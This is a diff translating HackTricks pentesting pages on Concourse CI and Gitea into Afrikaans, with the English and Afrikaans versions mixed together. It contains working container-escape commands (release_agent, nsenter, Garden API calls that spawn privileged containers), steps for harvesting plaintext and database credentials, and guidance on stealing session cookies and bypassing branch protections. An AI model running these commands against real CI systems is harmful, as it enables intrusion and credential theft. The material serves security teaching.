@@ -270,14 +259,12 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 # Reads the output
 cat /output
 ```
-
 > [!WARNING]
-> As you might have noticed this is just a [**regular release_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node
+> Soos jy dalk opgemerk het, is dit net 'n [**gereelde release_agent ontsnapping**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) wat die pad van die cmd in die node aanpas
 
-#### Escaping to the node from a Worker container
-
-A regular release_agent escape with a minor modification is enough for this:
+#### Ontsnapping na die node vanaf 'n Werker-container
 
+'n Gereelde release_agent ontsnapping met 'n klein aanpassing is genoeg hiervoor:
 ```bash
 mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
 
@@ -304,13 +291,11 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 # Reads the output
 cat /output
 ```
+#### Ontsnap na die node vanaf die Web-container
 
-#### Escaping to the node from the Web container
-
-Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless).
-
-However, it stores **local credentials in clear text**:
+Selfs al het die web-container 'n paar verdedigingstelsels gedeaktiveer, is dit **nie as 'n algemene bevoorregte container aan die gang nie** (byvoorbeeld, jy **kan nie** **monteer** nie en die **vermoëns** is baie **beperk**, so al die maklike maniere om uit die container te ontsnap is nutteloos).
 
+Dit stoor egter **lokale geloofsbriewe in duidelike teks**:
 ```bash
 cat /concourse-auth/local-users
 test:test
@@ -319,11 +304,9 @@ env | grep -i local_user
 CONCOURSE_MAIN_TEAM_LOCAL_USER=test
 CONCOURSE_ADD_LOCAL_USER=test:test
 ```
+Jy kan daardie geloofsbriewe gebruik om **in te log teen die webbediener** en **‘n bevoorregte houer te skep en na die node te ontsnap**.
 
-You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**.
-
-In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info):
-
+In die omgewing kan jy ook inligting vind om **toegang te verkry tot die postgresql** instansie wat concourse gebruik (adres, **gebruikersnaam**, **wagwoord** en databasis onder andere inligting):
 ```bash
 env | grep -i postg
 CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
@@ -344,39 +327,35 @@ select * from refresh_token;
 select * from teams; #Change the permissions of the users in the teams
 select * from users;
 ```
-
-#### Abusing Garden Service - Not a real Attack
+#### Misbruik van Garden Service - Nie 'n werklike aanval nie
 
 > [!WARNING]
-> This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before
+> Dit is net 'n paar interessante notas oor die diens, maar omdat dit net op localhost luister, sal hierdie notas geen impak hê wat ons nog nie voorheen uitgebuit het nie.
 
-By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections:
+Standaard sal elke concourse werker 'n [**Garden**](https://github.com/cloudfoundry/garden) diens op poort 7777 uitvoer. Hierdie diens word deur die Web meester gebruik om die werker **te dui wat hy moet uitvoer** (aflaai van die beeld en elke taak uitvoer). Dit klink redelik goed vir 'n aanvaller, maar daar is 'n paar goeie beskermings:
 
-- It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker.
-- The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service.
-
-Concourse workers run with high container privileges:
+- Dit is net **lokaal blootgestel** (127..0.0.1) en ek dink wanneer die werker teen die Web met die spesiale SSH-diens outentiseer, word 'n tonnel geskep sodat die webbediener **met elke Garden diens** binne elke werker kan **praat**.
+- Die webbediener **monitor die lopende houers elke paar sekondes**, en **onverwagte** houers word **verwyder**. So as jy 'n **aangepaste houer** wil **uitvoer**, moet jy **inmeng** met die **kommunikasie** tussen die webbediener en die garden diens.
 
+Concourse werkers loop met hoë houer bevoegdhede:
 ```
 Container Runtime: docker
 Has Namespaces:
-	pid: true
-	user: false
+pid: true
+user: false
 AppArmor Profile: kernel
 Capabilities:
-	BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
+BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
 Seccomp: disabled
 ```
-
 However, techniques like **mounting** the /dev device of the node or release_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated.
 
 > [!NOTE]
 > In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**.
 
-Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
+Let wel, terwyl ek met concourse gespeel het, het ek opgemerk dat wanneer 'n nuwe container geskep word om iets te laat loop, die container prosesse vanaf die werker container toeganklik is, so dit is soos 'n container wat 'n nuwe container binne-in hom skep.
 
 **Getting inside a running privileged container**
-
 ```bash
 # Get current container
 curl 127.0.0.1:7777/containers
@@ -389,30 +368,26 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties
 # Execute a new process inside a container
 ## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
 wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
-  --header='Content-Type:application/json' \
-  'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
+--header='Content-Type:application/json' \
+'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
 
 # OR instead of doing all of that, you could just get into the ns of the process of the privileged container
 nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
 ```
+**Skep 'n nuwe bevoorregte houer**
 
-**Creating a new privileged container**
-
-You can very easily create a new container (just run a random UID) and execute something on it:
-
+Jy kan baie maklik 'n nuwe houer skep (hardloop net 'n willekeurige UID) en iets daarop uitvoer:
 ```bash
 curl -X POST http://127.0.0.1:7777/containers \
-   -H 'Content-Type: application/json' \
-   -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
+-H 'Content-Type: application/json' \
+-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
 
 # Wget will be stucked there as long as the process is being executed
 wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
-  --header='Content-Type:application/json' \
-  'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
+--header='Content-Type:application/json' \
+'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
 ```
-
-However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers:
-
+However, die webbediener kontroleer elke paar sekondes die houers wat loop, en as 'n onverwagte een ontdek word, sal dit verwyder word. Aangesien die kommunikasie in HTTP plaasvind, kan jy die kommunikasie manipuleer om die verwydering van onverwagte houers te vermy:
 ```
 GET /containers HTTP/1.1.
 Host: 127.0.0.1:7777.
@@ -434,13 +409,8 @@ Host: 127.0.0.1:7777.
 User-Agent: Go-http-client/1.1.
 Accept-Encoding: gzip.
 ```
-
-## References
+## Verwysings
 
 - https://concourse-ci.org/vars.html
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
index 0cc6363a7..5d960758b 100644
--- a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
+++ b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md
@@ -2,25 +2,22 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Testing Environment
+## Toetsomgewing
 
-### Running Concourse
+### Loop Concourse
 
-#### With Docker-Compose
-
-This docker-compose file simplifies the installation to do some tests with concourse:
+#### Met Docker-Compose
 
+Hierdie docker-compose-lêer vereenvoudig die installasie om 'n paar toetse met concourse te doen:
 ```bash
 wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml
 docker-compose up -d
 ```
-
 You can download the command line `fly` for your OS from the web in `127.0.0.1:8080`
 
-#### With Kubernetes (Recommended)
-
-You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
+#### Met Kubernetes (Aanbeveel)
 
+You can easily deploy concourse in **Kubernetes** (in **minikube** byvoorbeeld) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
 ```bash
 brew install helm
 helm repo add concourse https://concourse-charts.storage.googleapis.com/
@@ -31,94 +28,90 @@ helm install concourse-release concourse/concourse
 # If you need to delete it
 helm delete concourse-release
 ```
-
-After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets:
-
+Na die generering van die concourse omgewing, kan jy 'n geheim genereer en toegang gee aan die SA wat in concourse web loop om K8s geheime te benader:
 ```yaml
 echo 'apiVersion: rbac.authorization.k8s.io/v1
 kind: ClusterRole
 metadata:
-  name: read-secrets
+name: read-secrets
 rules:
 - apiGroups: [""]
-  resources: ["secrets"]
-  verbs: ["get"]
+resources: ["secrets"]
+verbs: ["get"]
 
 ---
 
 apiVersion: rbac.authorization.k8s.io/v1
 kind: RoleBinding
 metadata:
-  name: read-secrets-concourse
+name: read-secrets-concourse
 roleRef:
-  apiGroup: rbac.authorization.k8s.io
-  kind: ClusterRole
-  name: read-secrets
+apiGroup: rbac.authorization.k8s.io
+kind: ClusterRole
+name: read-secrets
 subjects:
 - kind: ServiceAccount
-  name: concourse-release-web
-  namespace: default
+name: concourse-release-web
+namespace: default
 
 ---
 
 apiVersion: v1
 kind: Secret
 metadata:
-  name: super
-  namespace: concourse-release-main
+name: super
+namespace: concourse-release-main
 type: Opaque
 data:
-  secret: MWYyZDFlMmU2N2Rm
+secret: MWYyZDFlMmU2N2Rm
 
 ' | kubectl apply -f -
 ```
+### Skep Pyplyn
 
-### Create Pipeline
+'n Pyplyn bestaan uit 'n lys van [Jobs](https://concourse-ci.org/jobs.html) wat 'n geordende lys van [Steps](https://concourse-ci.org/steps.html) bevat.
 
-A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html).
+### Stappe
 
-### Steps
+Verskeie verskillende tipes stappe kan gebruik word:
 
-Several different type of steps can be used:
+- **die** [**`task` stap**](https://concourse-ci.org/task-step.html) **voert 'n** [**taak**](https://concourse-ci.org/tasks.html) **uit**
+- die [`get` stap](https://concourse-ci.org/get-step.html) haal 'n [bron](https://concourse-ci.org/resources.html) op
+- die [`put` stap](https://concourse-ci.org/put-step.html) werk 'n [bron](https://concourse-ci.org/resources.html) by
+- die [`set_pipeline` stap](https://concourse-ci.org/set-pipeline-step.html) konfigureer 'n [pyplyn](https://concourse-ci.org/pipelines.html)
+- die [`load_var` stap](https://concourse-ci.org/load-var-step.html) laai 'n waarde in 'n [lokale var](https://concourse-ci.org/vars.html#local-vars)
+- die [`in_parallel` stap](https://concourse-ci.org/in-parallel-step.html) voer stappe parallel uit
+- die [`do` stap](https://concourse-ci.org/do-step.html) voer stappe in volgorde uit
+- die [`across` stap modifier](https://concourse-ci.org/across-step.html#schema.across) voer 'n stap verskeie kere uit; een keer vir elke kombinasie van veranderlike waardes
+- die [`try` stap](https://concourse-ci.org/try-step.html) probeer om 'n stap uit te voer en slaag selfs al misluk die stap
 
-- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html)
-- the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html)
-- the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html)
-- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html)
-- the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars)
-- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel
-- the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence
-- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values
-- the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails
+Elke [stap](https://concourse-ci.org/steps.html) in 'n [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) loop in sy **eie houer**. Jy kan enigiets wat jy wil binne die houer uitvoer _(d.w.s. voer my toetse uit, voer hierdie bash-skrip uit, bou hierdie beeld, ens.)_. So as jy 'n werk het met vyf stappe, sal Concourse vyf houers skep, een vir elke stap.
 
-Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step.
-
-Therefore, it's possible to indicate the type of container each step needs to be run in.
-
-### Simple Pipeline Example
+Daarom is dit moontlik om die tipe houer aan te dui waarin elke stap uitgevoer moet word.
 
+### Eenvoudige Pyplyn Voorbeeld
 ```yaml
 jobs:
-  - name: simple
-    plan:
-      - task: simple-task
-        privileged: true
-        config:
-          # Tells Concourse which type of worker this task should run on
-          platform: linux
-          image_resource:
-            type: registry-image
-            source:
-              repository: busybox # images are pulled from docker hub by default
-          run:
-            path: sh
-            args:
-              - -cx
-              - |
-                sleep 1000
-                echo "$SUPER_SECRET"
-          params:
-            SUPER_SECRET: ((super.secret))
+- name: simple
+plan:
+- task: simple-task
+privileged: true
+config:
+# Tells Concourse which type of worker this task should run on
+platform: linux
+image_resource:
+type: registry-image
+source:
+repository: busybox # images are pulled from docker hub by default
+run:
+path: sh
+args:
+- -cx
+- |
+sleep 1000
+echo "$SUPER_SECRET"
+params:
+SUPER_SECRET: ((super.secret))
 ```
 
 ```bash
@@ -130,26 +123,21 @@ fly -t tutorial trigger-job --job pipe-name/simple --watch
 # From another console
 fly -t tutorial intercept --job pipe-name/simple
 ```
+Kontroleer **127.0.0.1:8080** om die pypuntvloei te sien.
 
-Check **127.0.0.1:8080** to see the pipeline flow.
+### Bash-skrip met uitvoer/invoer pypunt
 
-### Bash script with output/input pipeline
-
-It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**.
+Dit is moontlik om **die resultate van een taak in 'n lêer te stoor** en aan te dui dat dit 'n uitvoer is en dan die invoer van die volgende taak as die uitvoer van die vorige taak aan te dui. Wat concourse doen, is om **die gids van die vorige taak in die nuwe taak te monteer waar jy toegang kan hê tot die lêers wat deur die vorige taak geskep is**.
 
 ### Triggers
 
-You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time:
+Jy hoef nie die werksgeleenthede handmatig te aktiveer elke keer wanneer jy hulle wil uitvoer nie, jy kan ook program dat hulle elke keer uitgevoer word:
 
-- Some time passes: [Time resource](https://github.com/concourse/time-resource/)
-- On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource)
-- New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
-- Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
+- 'n Bietjie tyd verby: [Time resource](https://github.com/concourse/time-resource/)
+- Op nuwe verbintenisse na die hooftak: [Git resource](https://github.com/concourse/git-resource)
+- Nuwe PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
+- Trek of druk die nuutste beeld van jou app: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
 
-Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
+Kontroleer 'n YAML pypuntvoorbeeld wat aktiveer op nuwe verbintenisse na meester in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/gitea-security/README.md b/src/pentesting-ci-cd/gitea-security/README.md
index bf4f6485a..5dc5762c8 100644
--- a/src/pentesting-ci-cd/gitea-security/README.md
+++ b/src/pentesting-ci-cd/gitea-security/README.md
@@ -1,142 +1,130 @@
-# Gitea Security
+# Gitea Veiligheid
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## What is Gitea
+## Wat is Gitea
 
-**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go.
+**Gitea** is 'n **self-hosted gemeenskap bestuurde liggewig kode hosting** oplossing geskryf in Go.
 
 ![](<../../images/image (160).png>)
 
-### Basic Information
+### Basiese Inligting
 
 {{#ref}}
 basic-gitea-information.md
 {{#endref}}
 
-## Lab
-
-To run a Gitea instance locally you can just run a docker container:
+## Laboratorium
 
+Om 'n Gitea-instantie plaaslik te laat loop, kan jy eenvoudig 'n docker-container uitvoer:
 ```bash
 docker run -p 3000:3000 gitea/gitea
 ```
+Verbind met poort 3000 om die webblad te bekom.
 
-Connect to port 3000 to access the web page.
-
-You could also run it with kubernetes:
-
+Jy kan dit ook met kubernetes uitvoer:
 ```
 helm repo add gitea-charts https://dl.gitea.io/charts/
 helm install gitea gitea-charts/gitea
 ```
+## Ongeauthentiseerde Enumerasie
 
-## Unauthenticated Enumeration
+- Publieke repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
+- Geregistreerde gebruikers: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
+- Geregistreerde Organisasies: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations)
 
-- Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
-- Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
-- Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations)
+Let daarop dat **Gitea standaard nuwe gebruikers toelaat om te registreer**. Dit sal nie spesiaal interessante toegang aan die nuwe gebruikers oor ander organisasies/gebruiker repos gee nie, maar 'n **ingelogde gebruiker** mag in staat wees om **meer repos of organisasies te visualiseer**.
 
-Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**.
+## Interne Exploitatie
 
-## Internal Exploitation
+Vir hierdie scenario gaan ons veronderstel dat jy toegang tot 'n github rekening verkry het.
 
-For this scenario we are going to suppose that you have obtained some access to a github account.
+### Met Gebruiker Kredensiale/Web Koekie
 
-### With User Credentials/Web Cookie
+As jy op een of ander manier reeds kredensiale vir 'n gebruiker binne 'n organisasie het (of jy het 'n sessie koekie gesteel) kan jy **net inlog** en kyk watter **regte jy het** oor watter **repos,** in **watter spanne** jy is, **lys ander gebruikers**, en **hoe die repos beskerm word.**
 
-If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.**
-
-Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
+Let daarop dat **2FA gebruik mag word** so jy sal slegs toegang tot hierdie inligting hê as jy ook **daardie toets kan slaag**.
 
 > [!NOTE]
-> Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
+> Let daarop dat as jy **slaag om die `i_like_gitea` koekie te steel** (huidiglik geconfigureer met SameSite: Lax) kan jy **volledig die gebruiker naboots** sonder om kredensiale of 2FA te benodig.
 
-### With User SSH Key
+### Met Gebruiker SSH Sleutel
 
-Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
-
-With this key you can perform **changes in repositories where the user has some privileges**, however you can not use it to access gitea api to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to:
+Gitea laat **gebruikers** toe om **SSH sleutels** in te stel wat as **authentikasie metode gebruik sal word om kode namens hulle te ontplooi** (geen 2FA word toegepas nie).
 
+Met hierdie sleutel kan jy **veranderings in repositories waar die gebruiker sekere voorregte het, uitvoer**, egter kan jy dit nie gebruik om toegang tot die gitea api te verkry om die omgewing te enumerate nie. Jy kan egter **lokale instellings enumerate** om inligting oor die repos en gebruiker waartoe jy toegang het, te verkry:
 ```bash
 # Go to the the repository folder
 # Get repo config and current user name and email
 git config --list
 ```
+As die gebruiker sy gebruikersnaam as sy gitea gebruikersnaam gekonfigureer het, kan jy toegang verkry tot die **publieke sleutels wat hy ingestel het** in sy rekening op _https://github.com/\<gitea_username>.keys_, jy kan dit nagaan om te bevestig dat die private sleutel wat jy gevind het, gebruik kan word.
 
-If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\<gitea_username>.keys_, you could check this to confirm the private key you found can be used.
+**SSH sleutels** kan ook in repositories as **deploy sleutels** ingestel word. Enigeen met toegang tot hierdie sleutel sal in staat wees om **projekte vanaf 'n repository te begin**. Gewoonlik in 'n bediener met verskillende deploy sleutels sal die plaaslike lêer **`~/.ssh/config`** jou inligting gee oor watter sleutel verband hou.
 
-**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
+#### GPG Sleutels
 
-#### GPG Keys
-
-As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
-
-Check locally if the current user has any key with:
+Soos verduidelik [**hier**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) is dit soms nodig om die verbintenisse te teken of jy mag ontdek word.
 
+Kontroleer plaaslik of die huidige gebruiker enige sleutel het met:
 ```shell
 gpg --list-secret-keys --keyid-format=long
 ```
+### Met Gebruikersteken
 
-### With User Token
+Vir 'n inleiding oor [**Gebruikersteke kyk na die basiese inligting**](basic-gitea-information.md#personal-access-tokens).
 
-For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens).
+'n Gebruikersteken kan gebruik word **in plaas van 'n wagwoord** om te **verifieer** teen die Gitea bediener [**via API**](https://try.gitea.io/api/swagger#/). Dit sal **volledige toegang** oor die gebruiker hê.
 
-A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user.
+### Met Oauth Toepassing
 
-### With Oauth Application
+Vir 'n inleiding oor [**Gitea Oauth Toepassings kyk na die basiese inligting**](./#with-oauth-application).
 
-For an introduction about [**Gitea Oauth Applications check the basic information**](./#with-oauth-application).
+'n Aanvaller mag 'n **kwaadwillige Oauth Toepassing** skep om toegang te verkry tot bevoorregte data/aksies van die gebruikers wat dit waarskynlik as deel van 'n phishing veldtog aanvaar.
 
-An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+Soos verduidelik in die basiese inligting, sal die toepassing **volledige toegang oor die gebruikersrekening** hê.
 
-As explained in the basic information, the application will have **full access over the user account**.
+### Takbeskerming Omseiling
 
-### Branch Protection Bypass
+In Github het ons **github aksies** wat standaard 'n **teken met skrywe toegang** oor die repo ontvang wat gebruik kan word om **takbeskermings te omseil**. In hierdie geval **bestaan dit nie**, so die omseilings is meer beperk. Maar kom ons kyk na wat gedoen kan word:
 
-In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done:
+- **Aktiveer Push**: As iemand met skrywe toegang na die tak kan push, push net daarna.
+- **Whitelist Beperkte Push**: Op dieselfde manier, as jy deel van hierdie lys is, push na die tak.
+- **Aktiveer Samevoeg Whitelist**: As daar 'n samevoeg whitelist is, moet jy binne dit wees.
+- **Vereis goedkeuring is groter as 0**: Dan... moet jy 'n ander gebruiker kompromitteer.
+- **Beperk goedkeuring tot whitelisted**: As slegs whitelisted gebruikers kan goedkeur... moet jy 'n ander gebruiker kompromitteer wat binne daardie lys is.
+- **Verwerp verouderde goedkeuring**: As goedkeuring nie verwyder word met nuwe verbintenisse nie, kan jy 'n reeds goedgekeurde PR oorneem om jou kode in te voeg en die PR te saamvoeg.
 
-- **Enable Push**: If anyone with write access can push to the branch, just push to it.
-- **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch.
-- **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it
-- **Require approvals is bigger than 0**: Then... you need to compromise another user
-- **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list
-- **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR.
+Let daarop dat **as jy 'n org/repo admin is** jy die beskermings kan omseil.
 
-Note that **if you are an org/repo admin** you can bypass the protections.
+### Enumereer Webhooks
 
-### Enumerate Webhooks
+**Webhooks** is in staat om **spesifieke gitea inligting na sekere plekke te stuur**. Jy mag in staat wees om **daardie kommunikasie te benut**.\
+E however, gewoonlik word 'n **geheim** wat jy **nie kan herwin nie** in die **webhook** gestel wat **voorkom** dat eksterne gebruikers wat die URL van die webhook ken maar nie die geheim nie, om **daardie webhook te benut**.\
+Maar in sommige gevalle, in plaas daarvan om die **geheim** op sy plek te stel, stel mense dit **in die URL** as 'n parameter, so **om die URL's te kontroleer** kan jou toelaat om **geheime te vind** en ander plekke wat jy verder kan benut.
 
-**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\
-However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\
-But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further.
+Webhooks kan op **repo en org vlak** gestel word.
 
-Webhooks can be set at **repo and at org level**.
+## Post Exploitatie
 
-## Post Exploitation
+### Binne die bediener
 
-### Inside the server
+As jy op een of ander manier daarin geslaag het om binne die bediener waar gitea loop te kom, moet jy soek na die gitea konfigurasie lêer. Standaard is dit geleë in `/data/gitea/conf/app.ini`
 
-If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini`
+In hierdie lêer kan jy **sleutels** en **wagwoorde** vind.
 
-In this file you can find **keys** and **passwords**.
+In die gitea pad (standaard: /data/gitea) kan jy ook interessante inligting vind soos:
 
-In the gitea path (by default: /data/gitea) you can find also interesting information like:
+- Die **sqlite** DB: As gitea nie 'n eksterne db gebruik nie, sal dit 'n sqlite db gebruik.
+- Die **sessies** binne die sessies gids: Deur `cat sessions/*/*/*` te loop, kan jy die gebruikersname van die ingelogde gebruikers sien (gitea kan ook die sessies binne die DB stoor).
+- Die **jwt private sleutel** binne die jwt gids.
+- Meer **sensitiewe inligting** kan in hierdie gids gevind word.
 
-- The **sqlite** DB: If gitea is not using an external db it will use a sqlite db
-- The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB).
-- The **jwt private key** inside the jwt folder
-- More **sensitive information** could be found in this folder
+As jy binne die bediener is, kan jy ook **die `gitea` binêre** gebruik om inligting te bekom/wysig:
 
-If you are inside the server you can also **use the `gitea` binary** to access/modify information:
-
-- `gitea dump` will dump gitea and generate a .zip file
